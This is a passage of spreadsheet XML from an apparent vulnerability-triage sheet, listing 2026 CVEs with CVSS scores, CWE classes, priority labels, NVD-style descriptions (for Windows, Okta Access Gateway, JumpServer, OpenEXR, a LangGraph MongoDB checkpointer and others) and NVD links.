      <c r="L3781" s="5" t="inlineStr">
        <is>
          <t>In Audio HAL, there is a possible escalation of privilege due to improper input validation. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11087540; Issue ID: MSV-8246.</t>
        </is>
      </c>
      <c r="M3781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20512</t>
        </is>
      </c>
    </row>
    <row r="3782">
      <c r="A3782" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20517</t>
        </is>
      </c>
      <c r="C3782" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3782" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3782" s="5" t="inlineStr"/>
      <c r="F3782" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3782" s="5" t="inlineStr"/>
      <c r="H3782" s="5" t="inlineStr"/>
      <c r="I3782" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3782" s="5" t="inlineStr"/>
      <c r="K3782" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3782" s="5" t="inlineStr">
        <is>
          <t>In geniezone, there is a possible escalation of privilege due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10900510; Issue ID: MSV-6781.</t>
        </is>
      </c>
      <c r="M3782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20517</t>
        </is>
      </c>
    </row>
    <row r="3783">
      <c r="A3783" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44845</t>
        </is>
      </c>
      <c r="C3783" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3783" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3783" s="5" t="inlineStr"/>
      <c r="F3783" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3783" s="5" t="inlineStr"/>
      <c r="H3783" s="5" t="inlineStr"/>
      <c r="I3783" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3783" s="5" t="inlineStr"/>
      <c r="K3783" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3783" s="5" t="inlineStr">
        <is>
          <t>JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to 4.10.17, an authenticated administrator with Applet Host management and deployment permissions can inject Jinja2 expressions into the IP/Host field or Core Service Address field, causing Ansible to evaluate ansible_host inventory data or playbook variables during Applet Host deployment and execute arbitrary commands on the JumpServer control node. This issue is fixed in version 4.10.17.</t>
        </is>
      </c>
      <c r="M3783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44845</t>
        </is>
      </c>
    </row>
    <row r="3784">
      <c r="A3784" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48121</t>
        </is>
      </c>
      <c r="C3784" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3784" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3784" s="5" t="inlineStr"/>
      <c r="F3784" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3784" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3784" s="5" t="inlineStr"/>
      <c r="I3784" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3784" s="5" t="inlineStr"/>
      <c r="K3784" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L3784" s="5" t="inlineStr">
        <is>
          <t>@langchain/langgraph-checkpoint-mongodb provides a LangGraph.js CheckpointSaver implementation that uses MongoDB for storage. Versions 1.3.0 and below are vulnerable to NoSQL injection: checkpoint identifiers (thread_id, checkpoint_ns, checkpoint_id) from config.configurable are passed into MongoDB find() queries in MongoDBSaver.getTuple() without type enforcement. If an attacker supplies an object payload (such as MongoDB operators $gt or $ne) instead of a string, it can be interpreted as a query operator, bypassing thread scoping and leaking checkpoints, including pending writes, across tenants. Applications are at risk if they forward untrusted input into config.configurable without coercing it to strings or validating it against a schema, particularly in multi-tenant or user-isolated setups. Apps that only use server-issued, string-typed identifiers with schema validation rejecting non-string fields are not affected. This issue has been fixed in version 1.3.1.</t>
        </is>
      </c>
      <c r="M3784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48121</t>
        </is>
      </c>
    </row>
    <row r="3785">
      <c r="A3785" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5522</t>
        </is>
      </c>
      <c r="C3785" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3785" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3785" s="5" t="inlineStr"/>
      <c r="F3785" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3785" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H3785" s="5" t="inlineStr"/>
      <c r="I3785" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3785" s="5" t="inlineStr"/>
      <c r="K3785" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L3785" s="5" t="inlineStr">
        <is>
          <t>IBM QRadar 7.5.0 through 7.5.0 UP15 Interim Fix 005 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.</t>
        </is>
      </c>
      <c r="M3785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5522</t>
        </is>
      </c>
    </row>
    <row r="3786">
      <c r="A3786" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65979</t>
        </is>
      </c>
      <c r="C3786" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3786" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3786" s="5" t="inlineStr"/>
      <c r="F3786" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3786" s="5" t="inlineStr"/>
      <c r="H3786" s="5" t="inlineStr"/>
      <c r="I3786" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3786" s="5" t="inlineStr"/>
      <c r="K3786" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L3786" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. From version 3.4.0 through 3.4.12, the HTJ2K decoder parses a header-length field (PLEN) from a chunk's compressed data but never checks that this value fits within the available buffer before using it. When decoding, it advances the codestream pointer by the attacker-supplied header size and passes the resulting offset and remaining length to the OpenJPH memory-input path, so a crafted value pushes the pointer past the end of the buffer and causes an out-of-bounds read. Because this field comes straight from attacker-controlled EXR chunk data, the flaw is reachable during normal decoding of an untrusted file. This issue is fixed in version 3.4.13.</t>
        </is>
      </c>
      <c r="M3786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65979</t>
        </is>
      </c>
    </row>
    <row r="3787">
      <c r="A3787" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69350</t>
        </is>
      </c>
      <c r="C3787" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3787" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3787" s="5" t="inlineStr"/>
      <c r="F3787" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3787" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3787" s="5" t="inlineStr"/>
      <c r="I3787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3787" s="5" t="inlineStr"/>
      <c r="K3787" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3787" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69350</t>
        </is>
      </c>
    </row>
    <row r="3788">
      <c r="A3788" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69373</t>
        </is>
      </c>
      <c r="C3788" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3788" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3788" s="5" t="inlineStr"/>
      <c r="F3788" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3788" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3788" s="5" t="inlineStr"/>
      <c r="I3788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3788" s="5" t="inlineStr"/>
      <c r="K3788" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-190</t>
        </is>
      </c>
      <c r="L3788" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69373</t>
        </is>
      </c>
    </row>
    <row r="3789">
      <c r="A3789" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69449</t>
        </is>
      </c>
      <c r="C3789" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3789" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3789" s="5" t="inlineStr"/>
      <c r="F3789" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3789" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3789" s="5" t="inlineStr"/>
      <c r="I3789" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3789" s="5" t="inlineStr"/>
      <c r="K3789" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3789" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows BitLocker allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M3789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69449</t>
        </is>
      </c>
    </row>
    <row r="3790">
      <c r="A3790" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70425</t>
        </is>
      </c>
      <c r="C3790" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3790" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3790" s="5" t="inlineStr"/>
      <c r="F3790" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3790" s="5" t="inlineStr"/>
      <c r="H3790" s="5" t="inlineStr"/>
      <c r="I3790" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3790" s="5" t="inlineStr"/>
      <c r="K3790" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3790" s="5" t="inlineStr">
        <is>
          <t>Dell PowerScale OneFS, Versions 9.5.0.0 through 9.7.1.0, Versions 9.8.0.0 through 9.10.1.0, and Versions 9.11.0.0 through 9.14.0.1, contain a command injection vulnerability. An admin privileged local attacker could potentially exploit this vulnerability, leading to elevation of privileges to root, impacting confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="M3790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70425</t>
        </is>
      </c>
    </row>
    <row r="3791">
      <c r="A3791" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70594</t>
        </is>
      </c>
      <c r="C3791" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3791" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3791" s="5" t="inlineStr"/>
      <c r="F3791" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3791" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H3791" s="5" t="inlineStr"/>
      <c r="I3791" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3791" s="5" t="inlineStr"/>
      <c r="K3791" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="L3791" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 2.2.0 until 6.54.1, Ghost Admin did not invalidate existing sessions on login which could have allowed for session fixation attacks. Successful exploitation would have required another vulnerability on the same domain where Ghost Admin was hosted. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M3791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70594</t>
        </is>
      </c>
    </row>
    <row r="3792">
      <c r="A3792" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71339</t>
        </is>
      </c>
      <c r="C3792" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3792" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3792" s="5" t="inlineStr"/>
      <c r="F3792" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3792" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3792" s="5" t="inlineStr"/>
      <c r="I3792" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3792" s="5" t="inlineStr"/>
      <c r="K3792" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3792" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71339</t>
        </is>
      </c>
    </row>
    <row r="3793">
      <c r="A3793" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72719</t>
        </is>
      </c>
      <c r="C3793" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3793" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3793" s="5" t="inlineStr"/>
      <c r="F3793" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3793" s="5" t="inlineStr"/>
      <c r="H3793" s="5" t="inlineStr"/>
      <c r="I3793" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3793" s="5" t="inlineStr"/>
      <c r="K3793" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="L3793" s="5" t="inlineStr">
        <is>
          <t>Chatwoot is a customer engagement suite. Prior to 4.9.0, Chatwoot allowed authenticated account administrators to transfer Portals, Automation Rules, Macros, and Twilio Channels to other accounts through the writable account_id parameter. This could break tenant isolation and cause cross-account data exposure, unauthorized configuration changes, or loss of access to transferred resources. This issue is fixed in version 4.9.0.</t>
        </is>
      </c>
      <c r="M3793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72719</t>
        </is>
      </c>
    </row>
    <row r="3794">
      <c r="A3794" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72927</t>
        </is>
      </c>
      <c r="C3794" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3794" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3794" s="5" t="inlineStr"/>
      <c r="F3794" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3794" s="5" t="inlineStr"/>
      <c r="H3794" s="5" t="inlineStr"/>
      <c r="I3794" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3794" s="5" t="inlineStr"/>
      <c r="K3794" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3794" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Winsock allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72927</t>
        </is>
      </c>
    </row>
    <row r="3795">
      <c r="A3795" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72935</t>
        </is>
      </c>
      <c r="C3795" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3795" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3795" s="5" t="inlineStr"/>
      <c r="F3795" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3795" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3795" s="5" t="inlineStr"/>
      <c r="I3795" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3795" s="5" t="inlineStr"/>
      <c r="K3795" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3795" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72935</t>
        </is>
      </c>
    </row>
    <row r="3796">
      <c r="A3796" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72948</t>
        </is>
      </c>
      <c r="C3796" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3796" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3796" s="5" t="inlineStr"/>
      <c r="F3796" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3796" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3796" s="5" t="inlineStr"/>
      <c r="I3796" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3796" s="5" t="inlineStr"/>
      <c r="K3796" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L3796" s="5" t="inlineStr">
        <is>
          <t>Relative path traversal in Windows DNS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72948</t>
        </is>
      </c>
    </row>
    <row r="3797">
      <c r="A3797" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73067</t>
        </is>
      </c>
      <c r="C3797" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3797" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3797" s="5" t="inlineStr"/>
      <c r="F3797" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3797" s="5" t="inlineStr"/>
      <c r="H3797" s="5" t="inlineStr"/>
      <c r="I3797" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3797" s="5" t="inlineStr"/>
      <c r="K3797" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3797" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. Prior to 5.5.3, a crafted .traineddata model loaded through TessBaseAPI::Init can cause SquishedDawg::read_squished_dawg in src/dict/dawg.cpp to accept an unterminated forward-edge run, after which SquishedDawg::Load calls num_forward_edges(0) and last_edge in src/dict/dawg.h reads beyond edges_, causing a heap out-of-bounds read and process crash before image processing. This issue is fixed in version 5.5.3.</t>
        </is>
      </c>
      <c r="M3797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73067</t>
        </is>
      </c>
    </row>
    <row r="3798">
      <c r="A3798" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78625</t>
        </is>
      </c>
      <c r="C3798" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3798" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3798" s="5" t="inlineStr"/>
      <c r="F3798" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3798" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H3798" s="5" t="inlineStr"/>
      <c r="I3798" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3798" s="5" t="inlineStr"/>
      <c r="K3798" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3798" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not sanitize dashboard label values before writing them into generated PHP configuration files. The generated file is automatically included during authentication requests, resulting in execution with the privileges of the web server process.</t>
        </is>
      </c>
      <c r="M3798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78625</t>
        </is>
      </c>
    </row>
    <row r="3799">
      <c r="A3799" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78630</t>
        </is>
      </c>
      <c r="C3799" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3799" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3799" s="5" t="inlineStr"/>
      <c r="F3799" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3799" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H3799" s="5" t="inlineStr"/>
      <c r="I3799" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3799" s="5" t="inlineStr"/>
      <c r="K3799" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3799" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not neutralize shell metacharacters in SNMP configuration values before a privileged script uses them to construct OS commands. An authenticated local user with access to the management interface can supply crafted values, resulting in the execution of arbitrary OS commands with root privileges.</t>
        </is>
      </c>
      <c r="M3799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78630</t>
        </is>
      </c>
    </row>
    <row r="3800">
      <c r="A3800" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85981</t>
        </is>
      </c>
      <c r="C3800" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3800" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3800" s="5" t="inlineStr"/>
      <c r="F3800" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3800" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H3800" s="5" t="inlineStr"/>
      <c r="I3800" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3800" s="5" t="inlineStr"/>
      <c r="K3800" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L3800" s="5" t="inlineStr">
        <is>
          <t>The administrative panel of the Auth0 AD/LDAP Connector (versions 6.5.0 and earlier) listens on the local loopback interface without requiring authentication. This allows a local, low-privileged user or process on the host system to access the panel's management endpoints without credentials. Through these endpoints, a local user can read configuration details, including plaintext Active Directory service account credentials, and modify connector settings.</t>
        </is>
      </c>
      <c r="M3800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85981</t>
        </is>
      </c>
    </row>
    <row r="3801">
      <c r="A3801" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9176</t>
        </is>
      </c>
      <c r="C3801" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3801" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3801" s="5" t="inlineStr"/>
      <c r="F3801" s="5" t="inlineStr"/>
      <c r="G3801" s="5" t="inlineStr">
        <is>
          <t>ibm, websphere</t>
        </is>
      </c>
      <c r="H3801" s="5" t="inlineStr"/>
      <c r="I3801" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3801" s="5" t="inlineStr"/>
      <c r="K3801" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3801" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to a security bypass due to improper authentication controls. A local attacker could exploit this vulnerability to escalate privileges and gain unauthorized access to protected resources.</t>
        </is>
      </c>
      <c r="M3801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9176</t>
        </is>
      </c>
    </row>
    <row r="3802">
      <c r="A3802" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11363</t>
        </is>
      </c>
      <c r="C3802" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3802" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3802" s="5" t="inlineStr"/>
      <c r="F3802" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3802" s="5" t="inlineStr"/>
      <c r="H3802" s="5" t="inlineStr"/>
      <c r="I3802" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3802" s="5" t="inlineStr"/>
      <c r="K3802" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L3802" s="5" t="inlineStr">
        <is>
          <t>The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.6 via deserialization of untrusted input . This makes it possible for authenticated attackers, with administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. The deserialization is triggered automatically during form import when WPN_Helper::build_nf_cache() invokes $action-&gt;get_settings() immediately after the crafted form is imported, requiring no further interaction beyond the import action itself.</t>
        </is>
      </c>
      <c r="M3802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11363</t>
        </is>
      </c>
    </row>
    <row r="3803">
      <c r="A3803" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14505</t>
        </is>
      </c>
      <c r="C3803" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3803" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3803" s="5" t="inlineStr"/>
      <c r="F3803" s="5" t="n">
        <v>0.003</v>
